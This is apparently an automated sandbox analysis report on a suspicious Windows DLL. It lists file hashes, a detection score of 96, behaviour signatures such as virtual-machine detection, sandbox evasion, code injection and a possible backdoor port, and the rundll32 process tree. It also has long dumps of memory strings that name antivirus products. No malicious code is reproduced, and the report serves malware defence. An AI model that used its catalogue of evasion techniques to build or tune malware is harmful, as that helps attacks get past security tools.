Windows Analysis Report
8N8j6QojHn.dll

Overview

General Information

Sample name: 8N8j6QojHn.dll
(renamed file extension from exe to dll, renamed because original name is a hash value)
Original sample name: 6ad0ec9ca2464af8c9cddf6d8959850c7e106f2f.dll.exe
Analysis ID: 1578327
MD5: 78b199f0a4f453fc8a4a05d05695e91e
SHA1: 6ad0ec9ca2464af8c9cddf6d8959850c7e106f2f
SHA256: 7f675bb692afe3b8f6dcb4bd533de73e871f167e884c98a04453ec16da0e59dd
Tags: dllexeuser-NDA0E

Detection

Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Queries BIOS fan information (via WMI, Win32_Fan, often done to detect virtual machines)
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries temperature or sensor information (via WMI often done to detect virtual machines)
Queries voltage information (via WMI often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • loaddll64.exe (PID: 6840 cmdline: loaddll64.exe "C:\Users\user\Desktop\8N8j6QojHn.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
    • conhost.exe (PID: 6808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6304 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\8N8j6QojHn.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • rundll32.exe (PID: 644 cmdline: rundll32.exe "C:\Users\user\Desktop\8N8j6QojHn.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 2732 cmdline: rundll32.exe C:\Users\user\Desktop\8N8j6QojHn.dll,DllMain MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 5860 cmdline: rundll32.exe C:\Users\user\Desktop\8N8j6QojHn.dll,ServiceMain MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 4900 cmdline: C:\Windows\system32\WerFault.exe -u -p 5860 -s 428 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 2912 cmdline: rundll32.exe C:\Users\user\Desktop\8N8j6QojHn.dll,get_hostfxr_path MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 5916 cmdline: rundll32.exe "C:\Users\user\Desktop\8N8j6QojHn.dll",DllMain MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6728 cmdline: rundll32.exe "C:\Users\user\Desktop\8N8j6QojHn.dll",ServiceMain MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 4208 cmdline: C:\Windows\system32\WerFault.exe -u -p 6728 -s 428 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 5328 cmdline: rundll32.exe "C:\Users\user\Desktop\8N8j6QojHn.dll",get_hostfxr_path MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: rundll32.exe PID: 5328 | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
    No Sigma rule has matched
    No Suricata rule has matched

    AV Detection

    Source: 8N8j6QojHn.dll, ReversingLabs: Detection: 55%
    Source: unknown, HTTPS traffic detected: 34.120.62.213:443 -> 192.168.2.6:49769 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 34.120.62.213:443 -> 192.168.2.6:49933 version: TLS 1.2
    Source: 8N8j6QojHn.dll, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: sideload.pdb source: rundll32.exe, 00000006.00000002.2415158087.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.2373403680.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000C.00000002.2471395632.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000D.00000002.3522600692.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmp, 8N8j6QojHn.dll
    Source: Binary string: ore.pdb" source: rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: oleaut32.pdbeExtensions source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: _id":"28e89a43c000","debug_file":"cryptbase.pdb"},{"type4 source: rundll32.exe, 0000000D.00000003.2562895894.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488136352.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639278156.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: combase.pdbto ServerRsx source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: userenv.pdbEksizeh source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: 000" bug_file":"combase.pdb"},{"type":"symbolic",] source: rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935513236.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461958386.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714437251.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862052201.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521748816.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787058914.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639067578.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562830811.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: advapi32.pdbtione source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: iphlpapi.pdbrityupport source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: profapi.pdbeionionport source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: bcrypt.pdbexee 6er# source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: secur32.pdbecurityTools source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: msvcrt.pdbEedonvice.exe source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: _id":"28e89a43c000","debug_file":"cryptbase.pdb"},{"type source: rundll32.exe, 0000000D.00000003.2562895894.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488136352.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639278156.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: sechost.pdbEe source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ws2_32.pdbnmentSupported source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: kernelbase.pdbrrorCodeO| source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: NPAVTRAY.execomn.pdb"},{ source: rundll32.exe, 0000000D.00000003.3164057570.0000025BF00EC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163820855.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp
    Source: Binary string: wbemsvc.pdbecurityTools source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: imagehlp.pdbcurityTools source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: rundll32.pdbEe* source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: 9cd10f033ef5-1","code_id":"ce95420b156000","debug_file":"crypt32.pdb"},{"type":"symbolic","name":"C:\\Windows\\System32\\bcrypt.dll","arch":null,"image_addr":"0x7ffdb23N4 source: rundll32.exe, 0000000D.00000003.2562895894.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488136352.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521748816.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461958386.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639278156.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ntdll.pdbitysNameSDOmw== source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: rundll32.pdbEe* FRR source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: PAVPROXY.exeore.pdb"},{"\M source: rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163820855.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164109190.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp
    Source: Binary string: sspicli.pdbecurityTools source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: tdll.pdb"},{"type":" source: rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935513236.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461958386.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714437251.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862052201.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521748816.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787058914.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639067578.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562830811.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: drweb.exeore.pdb" source: rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Kernel.Appcore.pdb source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: imm32.pdbexedgeSupport source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ole32.pdbEXErorData source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: CLBCatQ.pdbnationcanner source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: JiangminAVandFWves.pdb"} source: rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163820855.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164109190.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp
    Source: Binary string: wbemcomn.pdbentSupported| source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ucrtbase.pdblogy source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Amsi.pdb source: rundll32.exe, 0000000D.00000003.2561337202.0000025BEE267000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE267000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE267000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE267000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: imm32.pdbexedgeSupport^ source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: rundll32.pdb source: rundll32.exe, 0000000D.00000002.3521988705.0000025BF00D3000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012096904.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2640548536.0000025BF0145000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561249504.0000025BF00EC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237777818.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp
    Source: Binary string: SpywareDoctorox.pdb"},{"Bs source: rundll32.exe, 0000000D.00000003.3163908029.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp
    Source: Binary string: profapi.pdbeionionport: source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: msvcrt.pdbEedon source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
